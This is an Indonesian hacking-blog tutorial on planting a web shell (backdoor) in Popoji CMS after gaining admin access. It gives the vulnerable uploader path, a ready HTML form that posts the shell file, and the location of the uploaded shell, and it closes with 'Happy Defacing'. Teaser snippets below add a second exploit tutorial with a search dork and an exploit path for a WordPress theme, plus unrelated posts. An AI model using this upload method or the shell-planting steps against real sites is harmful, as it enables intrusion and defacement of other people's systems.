Skip to main content

Cara Upload Shell di CMS Popoji

Hello World ; Malam Fans, Please Say Hello Haters ;*
Kali ini Guee bakal Share Tutorial Cara Upload Shell di CMS Popoji , uihh :v akhirnye dah bisa upload shell wkwk <(")
ya riset upload shell ini gua dapet dari indoXploit *uihh galak inii para sesepuh, ngerisetnye ampe jozz >3<"
Sebelumnye Baca ini dulu: Deface Website berbasis CMS Popoji Lewat Register Account

okeii kita akan bahas disini, bagaimana meng-upload sebuah backdoor di POPOJI CMS

Pertama Lu harus sudah mendapatkan akses Login sebagai admin di web target !!
kalo sudah punya akun admin yang sudah terverif/aktif silahkan Lu login , sampai muncul ke page Dashbor admin


kalo dah Login, langsung buka URL bug/vuln di: 
target.c0li/po-admin/js/plugins/uploader/upload.php

Ciri2 Vuln o.O ?
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

nb: wajib Login ke halaman dashbor dlu yee, kalo mau liat ini letak bugnyee
CSRF Code:

<form method="post" action="target.c0li/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_anda.php">
<input type="submit" value="exploit">
</form>

* save dgn ekstensi .html
* lalu bukak dengan browser kalean.

upload Shell lu. ingat shell kalian disini yang kalian upload harus berEkstensi .jpg (note: shellLu.jpg) , bukanlah .php, .phtml ataupun jenis bypass ekstensi yang lainnyaa.

jika berhasil . hasil output nya akan sama kyk yang pertama. tidak ada tulisan error sama sekali.

Terus cara tau Letak Shell nye Piye Om o.O ??


buka folder /po-upload/ , carane bukak url: target.c0li/po-content/po-upload/ , liat list yang kek di SS, carii shell lu, kalo dah ketemu Klik ae ..
kaloo pas folder /po-upload/ nya di buka ternyata muncul notice Forbidden wkkw, silahkan muter otak anda utk mencari backdoor lu wkwk..


akses shell: 
target/po-content/po-upload/nama_shell_anda-[angka_random]-polibrary.php


Hahaha, gak afdol yee ngeXploit tanpa tau cara bangunnye, Silahkan Baca artikel yg dulu Nue post di Blog ini: Tutorial Instalasi CMS Popoji

Sekian Artikel Cara MengUpload Backdoor pada CMS Popoji.
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Defacing gan ~
Sekian dan semoga bermanfaat .. terimakasih


Source and Thanks to: indoXploit


./Nuenomaru

Kami ada dan Berkarya, bukan utk disanjungi kok ^_^


Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Comments

Post a Comment

Popular posts from this blog

How to install CUCM 8.0.2 on Vmware | Call Manager Installation Guide

CUCM is a software-based call-processing component which serves as the main engine for Cisco VOIP infrastructure. This article can be used as a reference for your CUCM installation, This article can be used for any version of CUCM like 8.0, 8.6, 9.1 or 10.5. Let's jump to the installation directly. Make sure you have.. Before we begin, I want to make sure that you have the below softwares installed in your machine. Vmware Workstation Bootable Cisco Unified Call Manager ISO File GNS3 (Optional) - To Configure NTP Server A minimum of 2GB RAM and 80 GB HDD for Virtual Machine At this stage I assume that you have both Vmware Workstation and GNS3 installed. During installation you will be prompted to enter NTP server details. Follow the below steps to make a router to act as a NTP server in GNS3. Open ncpa.cpl from Run window. Find a Vmware network adapter. Double click the adapter and configure a private range IP, for example 120.0.0.1. Next open GNS3, Put a router and take console. Pa...

eXploit WP Themes Brainstorm Arbitrary File Upload Vulnerability

Hello World ; Malam Fans, Please Say Hello Haters :* xixixhi, Nuenomaru disini,  Sekarang Nue akan Share   Tutorial Deface dengan eXploit WP Themes Brainstorm Arbitrary File Upload Vulnerability * ini exploit lama sih wkwkw exploit ini salah satu bug/celah yang ada pada theme di CMS WordPress. iseng2 aja share, Kali aja masih  crotz  wkwkw * yg master minggir dlu ;* Lanjut intip tutor ae gaes :* mau sampai kapan ?! Dork: inurl:/wp-content/themes/brainstorm (Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan) 1. Dorking di search Engine 2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya. exploit: /[path]/ /wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php 3. Vulnerability ~ Blank Kurang lebih sih gituh awkkaw~ 4. Buat File Baru Berekstensi .php Contoh brain.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan t...

6 Url Shorteners Yang Menghasilkan Uang Selain AdF.ly

Salam sobat GBX nah di pertemuan kita kali ini ane akan membahas 6 Url Shorteners Yang Menghasilkan Uang Selain AdF.ly seperti yang anda tau adf.ly adalah url shortener terbaik yang membayar kita karena telah menggunakan jasannya, tapi selain adf.ly ternyata masih banyak lagi Url Shorteners Yang Menghasilkan Uang, sekarang kita lihat saja ulasan di bawah.  6 Url Shorteners Yang Menghasilkan Uang Selain AdF.ly 1. Adfly adf.ly Yup yang ini memang patut diletakkan di peringkat satu ya, Adfly sudah ada dan terpercaya sejak bertahu-tahun lalu dan sudah menjadi pemendek link / url terbaik selama ini.  Selain menyediakan fasilitas penyingkat url, adfly juga merupakan situs penghasil dollar yang sudah sangat terkenal (melalui Pay Per Click dan Referal). Banyak juga teman-teman di internet yang sudah sukses mendapatkan dollar lho. (adfly ini sudah terpercaya dan ya semoga terus aman begitu dech). Komisi yang telah anda dapatkan dari adfly ini bisa langsung di transfer ke pay...